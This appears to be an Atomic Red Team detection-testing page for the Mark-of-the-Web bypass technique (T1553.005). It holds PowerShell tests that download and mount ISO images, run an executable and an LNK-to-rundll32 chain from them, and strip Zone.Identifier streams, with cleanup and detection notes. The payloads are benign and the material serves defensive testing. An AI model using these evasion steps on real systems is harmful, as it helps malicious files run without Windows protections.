# T1553.005 - Mark-of-the-Web Bypass
Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)

Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)

## Atomic Tests

### Atomic Test #1 - Mount ISO image
Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: T1553.005.iso must exist on disk at specified location (#{path_of_iso})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1553.005\bin\T1553.005.iso) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1553.005\bin\T1553.005.iso) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "PathToAtomicsFolder\T1553.005\bin\T1553.005.iso"

```

In [ ]:
Invoke-AtomicTest T1553.005 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Mount-DiskImage -ImagePath "PathToAtomicsFolder\T1553.005\bin\T1553.005.iso"
```

In [ ]:
Invoke-AtomicTest T1553.005 -TestNumbers 1

#### Cleanup: 
```powershell
Dismount-DiskImage -ImagePath "PathToAtomicsFolder\T1553.005\bin\T1553.005.iso" | Out-Null
```

In [ ]:
Invoke-AtomicTest T1553.005 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Mount an ISO image and run executable from the ISO
Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. 
Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". 
ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,  
**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso"

```

In [ ]:
Invoke-AtomicTest T1553.005 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$keep = Mount-DiskImage -ImagePath "PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso" -StorageType ISO -Access ReadOnly
$driveLetter = ($keep | Get-Volume).DriveLetter
invoke-item "$($driveLetter):\hello.exe"
```

In [ ]:
Invoke-AtomicTest T1553.005 -TestNumbers 2

#### Cleanup: 
```powershell
Dismount-DiskImage -ImagePath "PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso" | Out-Null
Stop-process -name "hello" -Force -ErrorAction ignore
```

In [ ]:
Invoke-AtomicTest T1553.005 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Remove the Zone.Identifier alternate data stream
Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.
Removing this allows more freedom in executing scripts in PowerShell and avoids opening files in protected view.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: A test file with the Zone.Identifier attribute must be present.
##### Check Prereq Commands:
```powershell
if (Test-Path $env:tmp\ReadMe.md) { EXIT 0 } else { EXIT 1 }

```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/README.md -OutFile $env:tmp\ReadMe.md
Set-Content -Path $env:tmp\ReadMe.md -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3'

```

In [ ]:
Invoke-AtomicTest T1553.005 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Unblock-File -Path $env:tmp\ReadMe.md
```

In [ ]:
Invoke-AtomicTest T1553.005 -TestNumbers 3

#### Cleanup: 
```powershell
Set-Content -Path $env:tmp\ReadMe.md -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3'
```

In [ ]:
Invoke-AtomicTest T1553.005 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Execute LNK file from ISO
Executes LNK file document.lnk from AllTheThings.iso. Link file executes cmd.exe and rundll32 to in order to load and execute AllTheThingsx64.dll from the ISO which spawns calc.exe.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: AllTheThings.iso must exist on disk at specified location (#{path_of_iso})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1553.005\bin\AllTheThings.iso) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1553.005\bin\AllTheThings.iso) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/AllTheThings.iso -OutFile "PathToAtomicsFolder\T1553.005\bin\AllTheThings.iso"

```

In [ ]:
Invoke-AtomicTest T1553.005 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Mount-DiskImage -ImagePath "PathToAtomicsFolder\T1553.005\bin\AllTheThings.iso" -StorageType ISO -Access ReadOnly
$keep = Get-Volume -FileSystemLabel "AllTheThings"
$driveLetter = ($keep | Get-Volume).DriveLetter
$instance = [activator]::CreateInstance([type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}"))
$instance.Document.Application.ShellExecute($driveLetter+":\document.lnk","",$driveLetter+":\",$null,0)
```

In [ ]:
Invoke-AtomicTest T1553.005 -TestNumbers 4

#### Cleanup: 
```powershell
Dismount-DiskImage -ImagePath "PathToAtomicsFolder\T1553.005\bin\AllTheThings.iso" | Out-Null
```

In [ ]:
Invoke-AtomicTest T1553.005 -TestNumbers 4 -Cleanup

## Detection
Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.(Citation: Disable automount for ISO)